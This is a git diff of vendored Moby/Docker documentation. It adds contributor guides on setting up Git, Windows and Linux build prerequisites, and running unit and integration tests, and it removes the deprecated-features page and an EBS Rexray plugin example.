```bash + $ git push --set-upstream origin dry-run-test + Username for 'https://github.com': moxiegirl + Password for 'https://moxiegirl@github.com': + ``` + + Git prompts you for your GitHub username and password. Then, the command + returns a result. + + ```bash + Counting objects: 13, done. + Compressing objects: 100% (2/2), done. + Writing objects: 100% (3/3), 320 bytes | 0 bytes/s, done. + Total 3 (delta 1), reused 0 (delta 0) + To https://github.com/moxiegirl/moby.git + * [new branch] dry-run-test -> dry-run-test + Branch dry-run-test set up to track remote branch dry-run-test from origin. + ``` + +11. Open your browser to GitHub. + +12. Navigate to your Moby fork. + +13. Make sure the `dry-run-test` branch exists, that it has your commit, and the +commit is signed. + + ![Branch Signature](images/branch-sig.png) + +## Where to go next + +Congratulations, you have finished configuring both your local host environment +and Git for contributing. 
In the next section you'll [learn how to set up and +work in a Moby development container](set-up-dev-env.md). diff --git a/vendor/github.com/docker/docker/docs/contributing/software-req-win.md b/vendor/github.com/docker/docker/docs/contributing/software-req-win.md new file mode 100644 index 0000000000..3070d34e83 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/contributing/software-req-win.md @@ -0,0 +1,177 @@ +### Build and test Moby on Windows + +This page explains how to get the software you need to build, test, and run the +Moby source code for Windows and setup the required software and services: + +- Windows containers +- GitHub account +- Git + +## Prerequisites + +### 1. Windows Server 2016 or Windows 10 with all Windows updates applied + +The major build number must be at least 14393. This can be confirmed, for example, +by running the following from an elevated PowerShell prompt - this sample output +is from a fully up to date machine as at mid-November 2016: + + + PS C:\> $(gin).WindowsBuildLabEx + 14393.447.amd64fre.rs1_release_inmarket.161102-0100 + +### 2. Git for Windows (or another git client) must be installed + +https://git-scm.com/download/win. + +### 3. The machine must be configured to run containers + +For example, by following the quick start guidance at +https://msdn.microsoft.com/en-us/virtualization/windowscontainers/quick_start/quick_start or https://github.com/docker/labs/blob/master/windows/windows-containers/Setup.md + +### 4. If building in a Hyper-V VM + +For Windows Server 2016 using Windows Server containers as the default option, +it is recommended you have at least 1GB of memory assigned; +For Windows 10 where Hyper-V Containers are employed, you should have at least +4GB of memory assigned. +Note also, to run Hyper-V containers in a VM, it is necessary to configure the VM +for nested virtualization. + +## Usage + +The following steps should be run from an elevated Windows PowerShell prompt. 
+
+>**Note**: In a default installation of containers on Windows following the quick-start guidance at https://msdn.microsoft.com/en-us/virtualization/windowscontainers/quick_start/quick_start,
+the `docker.exe` client must run elevated to be able to connect to the daemon.
+
+### 1. Windows containers
+
+To test and run the Windows Moby engine, you need a system that supports Windows Containers:
+
+- Windows 10 Anniversary Edition
+- Windows Server 2016 running in a VM, on bare metal or in the cloud
+
+Check out the [getting started documentation](https://github.com/docker/labs/blob/master/windows/windows-containers/Setup.md) for details.
+
+### 2. GitHub account
+
+To contribute to the Docker project, you need a GitHub account.
+A free account is fine. All the Moby project repositories are public and visible to everyone.
+
+This guide assumes that you have basic familiarity with Git and Github terminology
+and usage.
+Refer to [GitHub For Beginners: Don’t Get Scared, Get Started](http://readwrite.com/2013/09/30/understanding-github-a-journey-for-beginners-part-1/)
+to get up to speed on Github.
+
+### 3. Git
+
+In PowerShell, run:
+
+    Invoke-Webrequest "https://github.com/git-for-windows/git/releases/download/v2.7.2.windows.1/Git-2.7.2-64-bit.exe" -OutFile git.exe -UseBasicParsing
+    Start-Process git.exe -ArgumentList '/VERYSILENT /SUPPRESSMSGBOXES /CLOSEAPPLICATIONS /DIR=c:\git\' -Wait
+    setx /M PATH "$env:Path;c:\git\cmd"
+
+You are now ready to clone and build the Moby source code.
+
+### 4. Clone Moby
+
+In a new (to pick up the path change) PowerShell prompt, run:
+
+    git clone https://github.com/moby/moby
+    cd moby
+
+This clones the main Moby repository. Check out [Moby Project](https://mobyproject.org)
+to learn about the other software that powers the Moby platform.
+
+### 5. Build and run
+
+Create a builder-container with the Moby source code. 
You can change the source +code on your system and rebuild any time: + + docker build -t nativebuildimage -f .\Dockerfile.windows . + docker build -t nativebuildimage -f Dockerfile.windows -m 2GB . # (if using Hyper-V containers) + +To build Moby, run: + + $DOCKER_GITCOMMIT=(git rev-parse --short HEAD) + docker run --name binaries -e DOCKER_GITCOMMIT=$DOCKER_GITCOMMIT nativebuildimage hack\make.ps1 -Binary + docker run --name binaries -e DOCKER_GITCOMMIT=$DOCKER_GITCOMMIT -m 2GB nativebuildimage hack\make.ps1 -Binary # (if using Hyper-V containers) + +Copy out the resulting Windows Moby Engine binary to `dockerd.exe` in the +current directory: + + docker cp binaries:C:\go\src\github.com\docker\docker\bundles\docker.exe docker.exe + docker cp binaries:C:\go\src\github.com\docker\docker\bundles\dockerd.exe dockerd.exe + +To test it, stop the system Docker daemon and start the one you just built: + + Stop-Service Docker + .\dockerd.exe -D + +The other make targets work too, to run unit tests try: +`docker run --rm docker-builder sh -c 'cd /c/go/src/github.com/docker/docker; hack/make.sh test-unit'`. + +### 6. Remove the interim binaries container + +_(Optional)_ + + docker rm binaries + +### 7. Remove the image + +_(Optional)_ + +It may be useful to keep this image around if you need to build multiple times. +Then you can take advantage of the builder cache to have an image which has all +the components required to build the binaries already installed. + + docker rmi nativebuildimage + +## Validation + +The validation tests can only run directly on the host. +This is because they calculate information from the git repo, but the .git directory +is not passed into the image as it is excluded via `.dockerignore`. 
+
+Run the following from a Windows PowerShell prompt (elevation is not required):
+(Note Go must be installed to run these tests)
+
+    hack\make.ps1 -DCO -PkgImports -GoFormat
+
+## Unit tests
+
+To run unit tests, ensure you have created the nativebuildimage above.
+Then run one of the following from an (elevated) Windows PowerShell prompt:
+
+    docker run --rm nativebuildimage hack\make.ps1 -TestUnit
+    docker run --rm -m 2GB nativebuildimage hack\make.ps1 -TestUnit # (if using Hyper-V containers)
+
+To run unit tests and binary build, ensure you have created the nativebuildimage above.
+Then run one of the following from an (elevated) Windows PowerShell prompt:
+
+    docker run nativebuildimage hack\make.ps1 -All
+    docker run -m 2GB nativebuildimage hack\make.ps1 -All # (if using Hyper-V containers)
+
+## Windows limitations
+
+Don't attempt to use a bind mount to pass a local directory as the bundles
+target directory.
+It does not work (golang attempts to follow a mapped folder incorrectly).
+Instead, use docker cp as per the example.
+
+`go.zip` is not removed from the image as it is used by the Windows CI servers
+to ensure the host and image are running consistent versions of go.
+
+Nanoserver support is a work in progress. Although the image will build if the
+`FROM` statement is updated, it will not work when running autogen through `hack\make.ps1`.
+It is suspected that the required GCC utilities (eg gcc, windres, windmc) silently
+quit due to the use of console hooks which are not available.
+
+The docker integration tests do not currently run in a container on Windows,
+predominantly due to Windows not supporting privileged mode, so anything using a volume would fail.
+They (along with the rest of the docker CI suite) can be run using
+https://github.com/jhowardmsft/docker-w2wCIScripts/blob/master/runCI/Invoke-DockerCI.ps1.
+
+## Where to go next
+
+In the next section, you'll [learn how to set up and configure Git for
+contributing to Moby](set-up-git.md). 
diff --git a/vendor/github.com/docker/docker/docs/contributing/software-required.md b/vendor/github.com/docker/docker/docs/contributing/software-required.md new file mode 100644 index 0000000000..b14c6f9050 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/contributing/software-required.md @@ -0,0 +1,94 @@ +### Get the required software for Linux or macOS + +This page explains how to get the software you need to use a Linux or macOS +machine for Moby development. Before you begin contributing you must have: + +* a GitHub account +* `git` +* `make` +* `docker` + +You'll notice that `go`, the language that Moby is written in, is not listed. +That's because you don't need it installed; Moby's development environment +provides it for you. You'll learn more about the development environment later. + +## Task 1. Get a GitHub account + +To contribute to the Moby project, you will need a GitHub account. A free account is +fine. All the Moby project repositories are public and visible to everyone. + +You should also have some experience using both the GitHub application and `git` +on the command line. + +## Task 2. Install git + +Install `git` on your local system. You can check if `git` is on already on your +system and properly installed with the following command: + +```bash +$ git --version +``` + +This documentation is written using `git` version 2.2.2. Your version may be +different depending on your OS. + +## Task 3. Install make + +Install `make`. You can check if `make` is on your system with the following +command: + +```bash +$ make -v +``` + +This documentation is written using GNU Make 3.81. Your version may be different +depending on your OS. + +## Task 4. Install or upgrade Docker + +If you haven't already, install the Docker software using the +instructions for your operating system. +If you have an existing installation, check your version and make sure you have +the latest Docker. 
+ +To check if `docker` is already installed on Linux: + +```bash +docker --version +Docker version 17.10.0-ce, build f4ffd25 +``` + +On macOS or Windows, you should have installed Docker for Mac or +Docker for Windows. + +```bash +$ docker --version +Docker version 17.10.0-ce, build f4ffd25 +``` + +## Tip for Linux users + +This guide assumes you have added your user to the `docker` group on your system. +To check, list the group's contents: + +``` +$ getent group docker +docker:x:999:ubuntu +``` + +If the command returns no matches, you have two choices. You can preface this +guide's `docker` commands with `sudo` as you work. Alternatively, you can add +your user to the `docker` group as follows: + +```bash +$ sudo usermod -aG docker ubuntu +``` + +You must log out and log back in for this modification to take effect. + + +## Where to go next + +In the next section, you'll [learn how to set up and configure Git for +contributing to Moby](set-up-git.md). diff --git a/vendor/github.com/docker/docker/docs/contributing/test.md b/vendor/github.com/docker/docker/docs/contributing/test.md new file mode 100644 index 0000000000..fdcee328a9 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/contributing/test.md @@ -0,0 +1,244 @@ +### Run tests + +Contributing includes testing your changes. If you change the Moby code, you +may need to add a new test or modify an existing test. Your contribution could +even be adding tests to Moby. For this reason, you need to know a little +about Moby's test infrastructure. + +This section describes tests you can run in the `dry-run-test` branch of your Docker +fork. If you have followed along in this guide, you already have this branch. +If you don't have this branch, you can create it or simply use another of your +branches. + +## Understand how to test Moby + +Moby tests use the Go language's test framework. 
In this framework, files +whose names end in `_test.go` contain test code; you'll find test files like +this throughout the Moby repo. Use these files for inspiration when writing +your own tests. For information on Go's test framework, see Go's testing package +documentation and the go test help. + +You are responsible for _unit testing_ your contribution when you add new or +change existing Moby code. A unit test is a piece of code that invokes a +single, small piece of code (_unit of work_) to verify the unit works as +expected. + +Depending on your contribution, you may need to add _integration tests_. These +are tests that combine two or more work units into one component. These work +units each have unit tests and then, together, integration tests that test the +interface between the components. The `integration` and `integration-cli` +directories in the Docker repository contain integration test code. Note that +`integration-cli` tests are now deprecated in the Moby project, and new tests +cannot be added to this suite - add `integration` tests instead using the API +client. + +Testing is its own specialty. If you aren't familiar with testing techniques, +there is a lot of information available to you on the Web. For now, you should +understand that, the Docker maintainers may ask you to write a new test or +change an existing one. + +## Run tests on your local host + +Before submitting a pull request with a code change, you should run the entire +Moby Engine test suite. The `Makefile` contains a target for the entire test +suite, named `test`. 
Also, it contains several targets for
+testing:
+
+| Target                 | What this target does                          |
+| ---------------------- | ---------------------------------------------- |
+| `test`                 | Run the unit, integration, and docker-py tests |
+| `test-unit`            | Run just the unit tests                        |
+| `test-integration`     | Run the integration tests                      |
+| `test-docker-py`       | Run the tests for the Docker API client        |
+
+Running the entire test suite on your current repository can take over half an
+hour. To run the test suite, do the following:
+
+1. Open a terminal on your local host.
+
+2. Change to the root of your Docker repository.
+
+   ```bash
+   $ cd moby-fork
+   ```
+
+3. Make sure you are in your development branch.
+
+   ```bash
+   $ git checkout dry-run-test
+   ```
+
+4. Run the `make test` command.
+
+   ```bash
+   $ make test
+   ```
+
+   This command does several things. It creates a container temporarily for
+   testing. Inside that container, the `make`:
+
+   * creates a new binary
+   * cross-compiles all the binaries for the various operating systems
+   * runs all the tests in the system
+
+   It can take approximately one hour to run all the tests. The time depends
+   on your host performance. The default timeout is 60 minutes, which is
+   defined in `hack/make.sh` (`${TIMEOUT:=60m}`). You can modify the timeout
+   value on the basis of your host performance. When they complete
+   successfully, you see the output concludes with something like this:
+
+   ```none
+   Ran 68 tests in 79.135s
+   ```
+
+## Run targets inside a development container
+
+If you are working inside a development container, you use the
+`hack/test/unit` script to run unit-tests, and `hack/make.sh` script to run
+integration and other tests. The `hack/make.sh` script doesn't
+have a single target that runs all the tests. Instead, you provide a single
+command line with multiple targets that does the same thing.
+
+Try this now.
+
+1. Open a terminal and change to the `moby-fork` root.
+
+2. Start a Moby development image. 
+ + If you are following along with this guide, you should have a + `dry-run-test` image. + + ```bash + $ docker run --privileged --rm -ti -v `pwd`:/go/src/github.com/docker/docker dry-run-test /bin/bash + ``` + +3. Run the unit tests using the `hack/test/unit` script. + + ```bash + # hack/test/unit + ``` + +4. Run the tests using the `hack/make.sh` script. + + ```bash + # hack/make.sh dynbinary binary cross test-integration test-docker-py + ``` + + The tests run just as they did within your local host. + + Of course, you can also run a subset of these targets too. For example, to run + just the integration tests: + + ```bash + # hack/make.sh dynbinary binary cross test-integration + ``` + + Most test targets require that you build these precursor targets first: + `dynbinary binary cross` + + +## Run unit tests + +We use golang standard [testing](https://golang.org/pkg/testing/) +package or [gocheck](https://labix.org/gocheck) for our unit tests. + +You can use the `TESTDIRS` environment variable to run unit tests for +a single package. + +```bash +$ TESTDIRS='opts' make test-unit +``` + +You can also use the `TESTFLAGS` environment variable to run a single test. The +flag's value is passed as arguments to the `go test` command. For example, from +your local host you can run the `TestBuild` test with this command: + +```bash +$ TESTFLAGS='-test.run ^TestValidateIPAddress$' make test-unit +``` + +On unit tests, it's better to use `TESTFLAGS` in combination with +`TESTDIRS` to make it quicker to run a specific test. + +```bash +$ TESTDIRS='opts' TESTFLAGS='-test.run ^TestValidateIPAddress$' make test-unit +``` + +## Run integration tests + +We use [gocheck](https://labix.org/gocheck) for our integration-cli tests. +You can use the `TESTFLAGS` environment variable to run a single test. The +flag's value is passed as arguments to the `go test` command. 
For example, from
+your local host you can run the `TestBuild` test with this command:
+
+```bash
+$ TESTFLAGS='-check.f DockerSuite.TestBuild*' make test-integration
+```
+
+To run the same test inside your Docker development container, you do this:
+
+```bash
+# TESTFLAGS='-check.f TestBuild*' hack/make.sh binary test-integration
+```
+
+## Test the Windows binary against a Linux daemon
+
+This explains how to test the Windows binary on a Windows machine set up as a
+development environment. The tests will be run against a daemon
+running on a remote Linux machine. You'll use **Git Bash** that came with the
+Git for Windows installation. **Git Bash**, just as it sounds, allows you to
+run a Bash terminal on Windows.
+
+1. If you don't have one open already, start a Git Bash terminal.
+
+   ![Git Bash](images/git_bash.png)
+
+2. Change to the `moby` source directory.
+
+   ```bash
+   $ cd /c/gopath/src/github.com/docker/docker
+   ```
+
+3. Set `DOCKER_REMOTE_DAEMON` as follows:
+
+   ```bash
+   $ export DOCKER_REMOTE_DAEMON=1
+   ```
+
+4. Set `DOCKER_TEST_HOST` to the `tcp://IP_ADDRESS:2376` value; substitute your
+   Linux machine's actual IP address. For example:
+
+   ```bash
+   $ export DOCKER_TEST_HOST=tcp://213.124.23.200:2376
+   ```
+
+5. Make the binary and run the tests:
+
+   ```bash
+   $ hack/make.sh binary test-integration
+   ```
+   Some tests are skipped on Windows for various reasons. You can see which
+   tests were skipped by re-running the make and passing in the
+   `TESTFLAGS='-test.v'` value. For example
+
+   ```bash
+   $ TESTFLAGS='-test.v' hack/make.sh binary test-integration
+   ```
+
+   Should you wish to run a single test such as one with the name
+   'TestExample', you can pass in `TESTFLAGS='-check.f TestExample'`. For
+   example
+
+   ```bash
+   $ TESTFLAGS='-check.f TestExample' hack/make.sh binary test-integration
+   ```
+
+You can now choose to make changes to the Moby source or the tests. If you
+make any changes, just run these commands again. 
+ +## Where to go next + +Congratulations, you have successfully completed the basics you need to +understand the Moby test framework. diff --git a/vendor/github.com/docker/docker/docs/contributing/who-written-for.md b/vendor/github.com/docker/docker/docs/contributing/who-written-for.md new file mode 100644 index 0000000000..1431f42c50 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/contributing/who-written-for.md @@ -0,0 +1,49 @@ +### README first + +This section of the documentation contains a guide for Moby project users who want to +contribute code or documentation to the Moby Engine project. As a community, we +share rules of behavior and interaction. Make sure you are familiar with the community guidelines before continuing. + +## Where and what you can contribute + +The Moby project consists of not just one but several repositories on GitHub. +So, in addition to the `moby/moby` repository, there is the +`containerd/containerd` repo, the `moby/buildkit` repo, and several more. +Contribute to any of these and you contribute to the Moby project. + +Not all Moby repositories use the Go language. Also, each repository has its +own focus area. So, if you are an experienced contributor, think about +contributing to a Moby project repository that has a language or a focus area you are +familiar with. + +If you are new to the open source community, to Moby, or to formal +programming, you should start out contributing to the `moby/moby` +repository. Why? Because this guide is written for that repository specifically. + +Finally, code or documentation isn't the only way to contribute. You can report +an issue, add to discussions in our community channel, write a blog post, or +take a usability test. You can even propose your own type of contribution. +Right now we don't have a lot written about this yet, but feel free to open an issue +to discuss other contributions. 
+ +## How to use this guide + +This is written for the distracted, the overworked, the sloppy reader with fair +`git` skills and a failing memory for the GitHub GUI. The guide attempts to +explain how to use the Moby Engine development environment as precisely, +predictably, and procedurally as possible. + +Users who are new to Engine development should start by setting up their +environment. Then, they should try a simple code change. After that, you should +find something to work on or propose a totally new change. + +If you are a programming prodigy, you still may find this documentation useful. +Please feel free to skim past information you find obvious or boring. + +## How to get started + +Start by getting the software you require. If you are on Mac or Linux, go to +[get the required software for Linux or macOS](software-required.md). If you are +on Windows, see [get the required software for Windows](software-req-win.md). diff --git a/vendor/github.com/docker/docker/docs/deprecated.md b/vendor/github.com/docker/docker/docs/deprecated.md deleted file mode 100644 index 1298370ba9..0000000000 --- a/vendor/github.com/docker/docker/docs/deprecated.md +++ /dev/null @@ -1,286 +0,0 @@ ---- -aliases: ["/engine/misc/deprecated/"] -title: "Deprecated Engine Features" -description: "Deprecated Features." -keywords: "docker, documentation, about, technology, deprecate" ---- - - - -# Deprecated Engine Features - -The following list of features are deprecated in Engine. -To learn more about Docker Engine's deprecation policy, -see [Feature Deprecation Policy](https://docs.docker.com/engine/#feature-deprecation-policy). 
- - -### Top-level network properties in NetworkSettings - -**Deprecated In Release: v1.13.0** - -**Target For Removal In Release: v1.16** - -When inspecting a container, `NetworkSettings` contains top-level information -about the default ("bridge") network; - -`EndpointID`, `Gateway`, `GlobalIPv6Address`, `GlobalIPv6PrefixLen`, `IPAddress`, -`IPPrefixLen`, `IPv6Gateway`, and `MacAddress`. - -These properties are deprecated in favor of per-network properties in -`NetworkSettings.Networks`. These properties were already "deprecated" in -docker 1.9, but kept around for backward compatibility. - -Refer to [#17538](https://github.com/docker/docker/pull/17538) for further -information. - -## `filter` param for `/images/json` endpoint -**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** - -**Target For Removal In Release: v1.16** - -The `filter` param to filter the list of image by reference (name or name:tag) is now implemented as a regular filter, named `reference`. - -### `repository:shortid` image references -**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** - -**Target For Removal In Release: v1.16** - -`repository:shortid` syntax for referencing images is very little used, collides with tag references can be confused with digest references. - -### `docker daemon` subcommand -**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** - -**Target For Removal In Release: v1.16** - -The daemon is moved to a separate binary (`dockerd`), and should be used instead. - -### Duplicate keys with conflicting values in engine labels -**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** - -**Target For Removal In Release: v1.16** - -Duplicate keys with conflicting values have been deprecated. A warning is displayed -in the output, and an error will be returned in the future. 
- -### `MAINTAINER` in Dockerfile -**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** - -`MAINTAINER` was an early very limited form of `LABEL` which should be used instead. - -### API calls without a version -**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** - -**Target For Removal In Release: v1.16** - -API versions should be supplied to all API calls to ensure compatibility with -future Engine versions. Instead of just requesting, for example, the URL -`/containers/json`, you must now request `/v1.25/containers/json`. - -### Backing filesystem without `d_type` support for overlay/overlay2 -**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** - -**Target For Removal In Release: v1.16** - -The overlay and overlay2 storage driver does not work as expected if the backing -filesystem does not support `d_type`. For example, XFS does not support `d_type` -if it is formatted with the `ftype=0` option. - -Please also refer to [#27358](https://github.com/docker/docker/issues/27358) for -further information. - -### Three arguments form in `docker import` -**Deprecated In Release: [v0.6.7](https://github.com/docker/docker/releases/tag/v0.6.7)** - -**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -The `docker import` command format `file|URL|- [REPOSITORY [TAG]]` is deprecated since November 2013. It's no more supported. - -### `-h` shorthand for `--help` - -**Deprecated In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -**Target For Removal In Release: v1.15** - -The shorthand (`-h`) is less common than `--help` on Linux and cannot be used -on all subcommands (due to it conflicting with, e.g. `-h` / `--hostname` on -`docker create`). For this reason, the `-h` shorthand was not printed in the -"usage" output of subcommands, nor documented, and is now marked "deprecated". 
- -### `-e` and `--email` flags on `docker login` -**Deprecated In Release: [v1.11.0](https://github.com/docker/docker/releases/tag/v1.11.0)** - -**Target For Removal In Release: v1.14** - -The docker login command is removing the ability to automatically register for an account with the target registry if the given username doesn't exist. Due to this change, the email flag is no longer required, and will be deprecated. - -### Separator (`:`) of `--security-opt` flag on `docker run` -**Deprecated In Release: [v1.11.0](https://github.com/docker/docker/releases/tag/v1.11.0)** - -**Target For Removal In Release: v1.14** - -The flag `--security-opt` doesn't use the colon separator(`:`) anymore to divide keys and values, it uses the equal symbol(`=`) for consistency with other similar flags, like `--storage-opt`. - -### `/containers/(id or name)/copy` endpoint - -**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)** - -**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -The endpoint `/containers/(id or name)/copy` is deprecated in favor of `/containers/(id or name)/archive`. - -### Ambiguous event fields in API -**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** - -The fields `ID`, `Status` and `From` in the events API have been deprecated in favor of a more rich structure. -See the events API documentation for the new format. - -### `-f` flag on `docker tag` -**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** - -**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -To make tagging consistent across the various `docker` commands, the `-f` flag on the `docker tag` command is deprecated. It is not longer necessary to specify `-f` to move a tag from one image to another. Nor will `docker` generate an error if the `-f` flag is missing and the specified tag is already in use. 
- -### HostConfig at API container start -**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** - -**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -Passing an `HostConfig` to `POST /containers/{name}/start` is deprecated in favor of -defining it at container creation (`POST /containers/create`). - -### `--before` and `--since` flags on `docker ps` - -**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** - -**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -The `docker ps --before` and `docker ps --since` options are deprecated. -Use `docker ps --filter=before=...` and `docker ps --filter=since=...` instead. - -### `--automated` and `--stars` flags on `docker search` - -**Deprecated in Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -**Target For Removal In Release: v1.15** - -The `docker search --automated` and `docker search --stars` options are deprecated. -Use `docker search --filter=is-automated=...` and `docker search --filter=stars=...` instead. - -### Driver Specific Log Tags -**Deprecated In Release: [v1.9.0](https://github.com/docker/docker/releases/tag/v1.9.0)** - -**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -Log tags are now generated in a standard way across different logging drivers. -Because of which, the driver specific log tag options `syslog-tag`, `gelf-tag` and -`fluentd-tag` have been deprecated in favor of the generic `tag` option. - - docker --log-driver=syslog --log-opt tag="{{.ImageName}}/{{.Name}}/{{.ID}}" - -### LXC built-in exec driver -**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)** - -**Removed In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** - -The built-in LXC execution driver, the lxc-conf flag, and API fields have been removed. 
- -### Old Command Line Options -**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)** - -**Removed In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** - -The flags `-d` and `--daemon` are deprecated in favor of the `daemon` subcommand: - - docker daemon -H ... - -The following single-dash (`-opt`) variant of certain command line options -are deprecated and replaced with double-dash options (`--opt`): - - docker attach -nostdin - docker attach -sig-proxy - docker build -no-cache - docker build -rm - docker commit -author - docker commit -run - docker events -since - docker history -notrunc - docker images -notrunc - docker inspect -format - docker ps -beforeId - docker ps -notrunc - docker ps -sinceId - docker rm -link - docker run -cidfile - docker run -dns - docker run -entrypoint - docker run -expose - docker run -link - docker run -lxc-conf - docker run -n - docker run -privileged - docker run -volumes-from - docker search -notrunc - docker search -stars - docker search -t - docker search -trusted - docker tag -force - -The following double-dash options are deprecated and have no replacement: - - docker run --cpuset - docker run --networking - docker ps --since-id - docker ps --before-id - docker search --trusted - -**Deprecated In Release: [v1.5.0](https://github.com/docker/docker/releases/tag/v1.5.0)** - -**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -The single-dash (`-help`) was removed, in favor of the double-dash `--help` - - docker -help - docker [COMMAND] -help - -### `--run` flag on docker commit - -**Deprecated In Release: [v0.10.0](https://github.com/docker/docker/releases/tag/v0.10.0)** - -**Removed In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** - -The flag `--run` of the docker commit (and its short version `-run`) were deprecated in favor -of the `--changes` flag that allows to pass `Dockerfile` commands. 
- - -### Interacting with V1 registries - -**Disabled By Default In Release: v1.14** - -**Target For Removal In Release: v1.17** - -Version 1.9 adds a flag (`--disable-legacy-registry=false`) which prevents the -docker daemon from `pull`, `push`, and `login` operations against v1 -registries. Though enabled by default, this signals the intent to deprecate -the v1 protocol. - -Support for the v1 protocol to the public registry was removed in 1.13. Any -mirror configurations using v1 should be updated to use a -[v2 registry mirror](https://docs.docker.com/registry/recipes/mirror/). - -### Docker Content Trust ENV passphrase variables name change -**Deprecated In Release: [v1.9.0](https://github.com/docker/docker/releases/tag/v1.9.0)** - -**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -Since 1.9, Docker Content Trust Offline key has been renamed to Root key and the Tagging key has been renamed to Repository key. Due to this renaming, we're also changing the corresponding environment variables - -- DOCKER_CONTENT_TRUST_OFFLINE_PASSPHRASE is now named DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE -- DOCKER_CONTENT_TRUST_TAGGING_PASSPHRASE is now named DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE diff --git a/vendor/github.com/docker/docker/docs/extend/EBS_volume.md b/vendor/github.com/docker/docker/docs/extend/EBS_volume.md deleted file mode 100644 index 8c64efa164..0000000000 --- a/vendor/github.com/docker/docker/docs/extend/EBS_volume.md +++ /dev/null @@ -1,164 +0,0 @@ ---- -description: Volume plugin for Amazon EBS -keywords: "API, Usage, plugins, documentation, developer, amazon, ebs, rexray, volume" -title: Volume plugin for Amazon EBS ---- - - - -# A proof-of-concept Rexray plugin - -In this example, a simple Rexray plugin will be created for the purposes of using -it on an Amazon EC2 instance with EBS. It is not meant to be a complete Rexray plugin. 
- -The example source is available at [https://github.com/tiborvass/rexray-plugin](https://github.com/tiborvass/rexray-plugin). - -To learn more about Rexray: [https://github.com/codedellemc/rexray](https://github.com/codedellemc/rexray) - -## 1. Make a Docker image - -The following is the Dockerfile used to containerize rexray. - -```Dockerfile -FROM debian:jessie -RUN apt-get update && apt-get install -y --no-install-recommends wget ca-certificates -RUN wget https://dl.bintray.com/emccode/rexray/stable/0.6.4/rexray-Linux-x86_64-0.6.4.tar.gz -O rexray.tar.gz && tar -xvzf rexray.tar.gz -C /usr/bin && rm rexray.tar.gz -RUN mkdir -p /run/docker/plugins /var/lib/libstorage/volumes -ENTRYPOINT ["rexray"] -CMD ["--help"] -``` - -To build it you can run `image=$(cat Dockerfile | docker build -q -)` and `$image` -will reference the containerized rexray image. - -## 2. Extract rootfs - -```sh -$ TMPDIR=/tmp/rexray # for the purpose of this example -$ # create container without running it, to extract the rootfs from image -$ docker create --name rexray "$image" -$ # save the rootfs to a tar archive -$ docker export -o $TMPDIR/rexray.tar rexray -$ # extract rootfs from tar archive to a rootfs folder -$ ( mkdir -p $TMPDIR/rootfs; cd $TMPDIR/rootfs; tar xf ../rexray.tar ) -``` - -## 3. 
Add plugin configuration - -We have to put the following JSON to `$TMPDIR/config.json`: - -```json -{ - "Args": { - "Description": "", - "Name": "", - "Settable": null, - "Value": null - }, - "Description": "A proof-of-concept EBS plugin (using rexray) for Docker", - "Documentation": "https://github.com/tiborvass/rexray-plugin", - "Entrypoint": [ - "/usr/bin/rexray", "service", "start", "-f" - ], - "Env": [ - { - "Description": "", - "Name": "REXRAY_SERVICE", - "Settable": [ - "value" - ], - "Value": "ebs" - }, - { - "Description": "", - "Name": "EBS_ACCESSKEY", - "Settable": [ - "value" - ], - "Value": "" - }, - { - "Description": "", - "Name": "EBS_SECRETKEY", - "Settable": [ - "value" - ], - "Value": "" - } - ], - "Interface": { - "Socket": "rexray.sock", - "Types": [ - "docker.volumedriver/1.0" - ] - }, - "Linux": { - "AllowAllDevices": true, - "Capabilities": ["CAP_SYS_ADMIN"], - "Devices": null - }, - "Mounts": [ - { - "Source": "/dev", - "Destination": "/dev", - "Type": "bind", - "Options": ["rbind"] - } - ], - "Network": { - "Type": "host" - }, - "PropagatedMount": "/var/lib/libstorage/volumes", - "User": {}, - "WorkDir": "" -} -``` - -Please note a couple of points: -- `PropagatedMount` is needed so that the docker daemon can see mounts done by the -rexray plugin from within the container, otherwise the docker daemon is not able -to mount a docker volume. -- The rexray plugin needs dynamic access to host devices. For that reason, we -have to give it access to all devices under `/dev` and set `AllowAllDevices` to -true for proper access. -- The user of this simple plugin can change only 3 settings: `REXRAY_SERVICE`, -`EBS_ACCESSKEY` and `EBS_SECRETKEY`. This is because of the reduced scope of this -plugin. Ideally other rexray parameters could 